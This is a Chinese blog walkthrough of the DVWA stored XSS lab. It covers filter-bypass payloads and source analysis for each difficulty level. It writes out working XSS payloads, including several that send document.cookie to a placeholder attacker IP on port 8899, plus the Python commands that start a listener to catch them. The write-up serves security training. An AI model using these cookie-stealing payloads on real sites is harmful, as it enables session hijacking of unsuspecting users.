DVWA通关--存储型XSS(XSS (Stored))

最新推荐文章于 2024-05-29 14:49:51 发布
最新推荐文章于 2024-05-29 14:49:51 发布
阅读量6.6k 收藏 31
点赞数 8
分类专栏: # XSS dvwa 文章标签: javascript 网络安全 xss html php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/111304145
版权
dvwa 同时被 2 个专栏收录
10 篇文章 6 订阅
订阅专栏
XSS
4 篇文章 0 订阅
订阅专栏

目录

LOW 

通关步骤

源码分析

MEDIUM

通关步骤

源码分析

HIGH

通关步骤

源码分析

IMPOSSIBLE

源码分析

存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据库等存储介质中,因此功效持久。攻击者可以把payload放在网站留言板、评论等位置,待用户访问网站并有匹配payload的行为时,即可触发攻击。

存储型XSS和反射型XSS本质都是一样的,只不过反射型XSS的payload的行动路径是:受害者浏览器--服务器--受害者浏览器,而存储型XSS的payload的行动路径是:浏览器--服务器--存储介质--服务器--受害者浏览器。

相关推荐:

DVWA通关--反射型XSS(XSS (Reflected))_箭雨镜屋-CSDN博客

pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)_箭雨镜屋-CSDN博客

WebGoat (A7) Cross Site Scripting (XSS)_箭雨镜屋-CSDN博客

LOW 

通关步骤

1、试一下最简单的payload:<script>alert(1)</script>

这里我是写在message输入框里面的,name输入框是限制长度的,其实这个长度限制如果仅仅是在html中控制,是可以突破的。

等到第二步的时候来突破一下。

成功弹框

2、尝试突破一下name输入框长度限制

可以在name输入框右键->查看元素(chrome浏览器里面是右键->检查),或者F12打开之后在elements里面自己找找。

可以看到name输入框maxlength是10

直接把maxlength的值改成100

这样就可以绕开输入框长度的html标签属性限制,把payload完整输入进去了

弹出弹框

3、尝试一下获取cookie:

payload:<script>document.write('<img src="http://ip:8899/'+document.cookie+'"/>')</script>

payload里面的ip换成自己的攻击机ip地址,这个ip地址必须是目标机可达的ip地址,并且攻击机上需要起http协议。

简单地起http协议的方法有两种:

(1)用python2:

python2 -m SimpleHTTPServer 8899

(2)用python3:

python3 -m http.server 8899

本来想直接在message输入框输入应该没有什么问题,原来message输入框也有输入长度限制

还是按照步骤2的办法绕过

获取到cookie

P.S.   测试的时候还发现每次点击浏览器的刷新键,都会再生成一个一条guestbook记录。这应该是low等级没有做防止表单重复提交的动作。

源码分析

表单提交后name和message中的内容首先被trim函数移除左右两边的字符,再被stripslashes()函数删除反斜杠(\),然后经过mysqli_real_escape_string() 函数的处理,转义了特殊字符(包括NUL(ASCII 0)、\n、\r、\、'、" 和 Control-Z),然后直接代入mysqli_query()函数来执行INSERT INTO的SQL语句。

完全没有对XSS的防护,另外对SQL注入的防护也不彻底。

MEDIUM

通关步骤

1、这关<script>alert(1)</script>不好使了,显示的都只剩下alert(1)了

2、既然是删除式过滤,常规思路可以尝试以下大小写绕过,双写绕过之类的,不行的话试试没有script的payload。

这次我打算试试双写绕过。

考虑到删得连尖括号都不剩了,试试paylaod:<scrip<script>t>alert(1)</scrip<script>t>

成功弹框

根据这个结果,应该是name里的paylaod生效了,注入点在name输入框。

获取cookie和LOW差不多,注意双写标签就好,不赘述了。

源码分析

比起LOW等级的代码,MEDIUM等级主要是有这三个高亮的地方的修改:

(1)对message的内容中的预定义字符之前添加反斜杠(addslashes函数)。预定义字符包括   '、"、\、NULL(其实感觉这步挺多余的,因为默认地,PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes(),所以不应对已转义过的字符串使用 addslashes(),会导致双层转义,详细可见https://www.w3school.com.cn/php/func_string_addslashes.asp

然后用strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

(2)将message中的预定义字符转换为html实体(htmlspecialchars函数)。预定义的字符包含&、<、>、'、"

(3)将name中的<script>删除(使用str_replace函数进行字符串替换,由于该函数是区分参数大小写的,所以也可以采用大写绕过)

本靶场存储型XSS注入的输出位置在html标签中间,因此由于message那里将包括<和>的预定义字符转换成了html实体,所以message处无法注入。

而name处仅仅是对<script>进行了删除,并且该删除操作采用的还是区分参数大小写的函数,而且没有循环删除。

因此name这里至少可以用三种方法绕过:(1)双写<script>绕过,如本文上述示例(2)大写绕过,比如<sCript>(3)换成不带<script>标签的payload

HIGH

通关步骤

1、先用<script>alert(1)</script>试一下,name和message同时试一试

从结果来看,这个name字段的奇葩结果让我想起了反射型XSS的HIGH等级,那边是用正则表达式<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t来过滤的

2、试一下payload:<img src=x οnerrοr=alert(1)>

或者payload:<iframe οnlοad=alert(1)></iframe>

都是可以注入成功的

3、获取cookie

本来想用我之前写的DVWA通关--反射型XSS(XSS (Reflected))里面的payload:

<a href="" οnclick=&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#119;&#114;&#105;&#116;&#101;&#40;&#39;&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#105;&#112;&#58;&#56;&#56;&#57;&#57;&#47;&#39;&#43;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#43;&#39;&#34;&#47;&#62;&#39;&#41;>hh</a>

(onclick后面是html实体编码了,明文payload是<a href="" οnclick=document.write('<img src="http://ip:8899/'+document.cookie+'"/>')>hh</a>)

但是操作的时候发现name输入框输入不了这么长的字符串,maxlength属性改成1000都不行。

网上查了一下,这个报错是mysql报的,看来改html代码是绕过不了了。

又一些机缘巧合,发现name输入框好像最多maxlength=100

放弃这个之后,我思考了一下,这关获取cookie需要满足两个条件:

(1)payload匹配不上<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t。因此payload中使用的外层标签中就不能有src属性。

(2)payload中的html标签最好是空标签,这样长度可以短一点。

功夫不负有心人啊。。终于找到符合条件的payload,先试一下弹框:<img alt=x οnmοuseοver=alert(1)>

鼠标滑过这个破碎的图片标识的时候会触发弹框

尝试获取cookie的payload:<img alt=x οnmοuseοver=document.write('<img src="http://ip:8899/'+document.cookie+'"/>')>

结果发现又不行啊。。。匹配上<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t了,看来事件的选取也很重要,不能带s

又费了九牛二虎之力,终于又搞出来个payload:<input οnblur="alert(1)">

这把是要先让留言中的输入框获得焦点(框里点一下),然后再使其失去焦点(框外点一下),才能触发弹框。

试试获取cookie的payload:<input οnblur="document.write('<img src=&quot;http://ip:8/'+document.cookie+'&quot;/>')">

从构造这个payload的过程中学习了两点:

(1)事件发生后的动作中如果包含>,为了避免这个>匹配上payload标签的<,一种方法是对动作(事件= 之后的内容)进行html实体编码,另一种是把动作用双引号括起来。

(2)这个payload涉及到了html中的引号三层嵌套,采用的方法是双引号嵌套单引号,最内层用的是双引号的html实体编码,避免和最外层双引号组成一对。

源码分析

果然是这个浓眉大眼的家伙<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t

HIGH的代码和MEDIUM的代码相差不大,就是对name的处理上,把str_replace()函数换成了preg_replace()函数,使用这个函数来删掉能够匹配上正则表达式<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t的子字符串,并且匹配的时候不区分大小写。

IMPOSSIBLE

源码分析

IMPOSSIBLE的源代码包含对三种攻击的防范:

(1)橙色下划线的部分是对CSRF的防范,采用的是创建和检查token的方式。

这个后面到CSRF通关的时候再说。

另外,托这个CSRF token的福,还解决了表单重复提交的问题。这一关刷新浏览器不会增加一份内容一样的留言,而是会像下面这样提示CSRF token is incorrect。

(2)黄色荧光笔标出来的部分是对XSS的防范,采用的是htmlspecialchars函数将输出中的预定义字符转换为HTML编码的方法。

函数语法:

htmlspecialchars(string,flags,character-set,double_encode)

预定义的字符包含&、<、>、'、"

其中是否编码引号是可以通过flags参数控制的。

从下图可见,这里flags参数采用的是默认值,因此这里只编码了双引号。

不过由于这里输出是在标签中间,和引号没啥关系,编码了 < 和 > 也就没有操作空间了。

(没错,和反射性XSS用的是同一种方法)

(3)粉色括起来的部分是对SQL注入的防范,采用了预编译语句。这个到SQL注入通关的时候再分析。

仙女象
关注
  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
存储xss_安全测试之XSS
weixin_39989159的博客
11-29 1605
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
DVWA -XSSStored)-通关教程-完结
刘箫-技术库
04-11 2520
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
[网络安全]DVWAXSS(Stored)攻击姿势及解题详析合集
等风来
05-18 4888
trim() 函数移除字符串两侧的空格,以确保数据在插入到数据库时没有多余的空白字符。 使用 stripslashes() 函数去除反斜杠,同时使用 mysqli_real_escape_string() 函数转义特殊字符。使用 mysqli_real_escape_string() 函数将特殊字符转义为它们的 Unicode 编码,以确保它们不会被视为 SQL 语句的一部分。从源代码来看,它没有明确的防御 XSS 攻击的措施。
存储XSS
最新发布
2401_84466361的博客
05-29 1043
什么是存储xss:提交恶意xss数据,存入数据库中,访问时触发。存储xss和反射xss区别:存储存入数据库中,可持续时间长,而反射持续时间短,仅对本次访问有影响,反射一般要配合社工。存储xss操作过程:嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。存储xss可能出现的位置:可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息....同源策略。
xss存储
xu_1234567的博客
11-04 4736
1.存储xss原理 存储xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
DVWA-XSS(Stored)
自强不息
01-15 421
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
XSS-存储
qq_39416206的博客
03-14 450
一、知识点 同源策略: 所谓同源:需要同 域名/host、端口、协议 存储xss是什么 提交恶意xss数据,存入数据库中,访问时触发。 存储xss可能出现的位置 可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息 获取到别人的Cookie怎么登陆别人用户 可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器 存储XSS怎么预防? XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4633
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
DVWA-master.zip
01-04
DVWA中的XSS练习涵盖了反射存储两种类,让你了解如何防范这种攻击,比如使用输入验证、转义特殊字符以及设置HTTP-only cookie等。 4. **命令注入** 在DVWA中,命令注入漏洞允许攻击者执行服务器上的任意...
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
XSS漏洞
weixin_50340347的博客
06-19 816
xss(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面插入恶意JS代码,这些代码在HTML解释时会被当做脚本执行,所以当用户请求该网页时,嵌入其中JS代码就会被执行,从而达到攻击的目的.
存储xss_WEB安全之XSS(1)
weixin_39653448的博客
12-05 816
大家好,我是阿里斯,一名IT行业小白。由于工作原因停更已经好久,中间虽然也水了俩篇文章,但是个人感觉该继续水下去了,因为收到了不止一位粉丝的监督。那么就从今天开始吧,接下来的主要内容主要围绕xss展开。什么是同源策略同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用javascript读取abc.com里面的文件...
存储xss
weixin_42576186的博客
12-26 367
存储XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它指的是攻击者往Web应用程序中注入恶意代码,被存储在服务器端,当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。 存储XSS攻击通常发生在用户留言板、论坛和博客等功能中,攻击者可以在留言板中发布带有恶意代码的留言,当其他用户浏览留言板时就会受到攻击。存储XSS攻击也可能发生在用户提交表单时,如果Web应用程...
Web渗透测试之存储XSS
julielele的博客
06-23 1430
存储XSS,插入">即可发生弹窗。
xss漏洞知识总结
ma963852的博客
04-14 5633
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类: (1)反射 反射xss又称非持久性xss,需要用户点击带有
DVWA靶场通关记录(存储XSS漏洞)
weixin_73557450的博客
05-29 164
而这些操作都是对message栏目实施的,name栏只是简单的替换了标签,但name栏有输入长度限制。和存储漏洞一样的是,这回我们仍然换标签,源代码中用正则表达式绕过了标签,我们可以换成或存储XSS漏洞与反射不同的是,存储持续时间会很长,即便刷新页面或者关闭页面,再次打开时XSS漏洞依然会发挥作用。刷新页面或者退出页面时,我们注入的XSS攻击仍然有效,这就是存储漏洞的特点。XSS存储漏洞就到这里了,欢迎反馈和交流。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值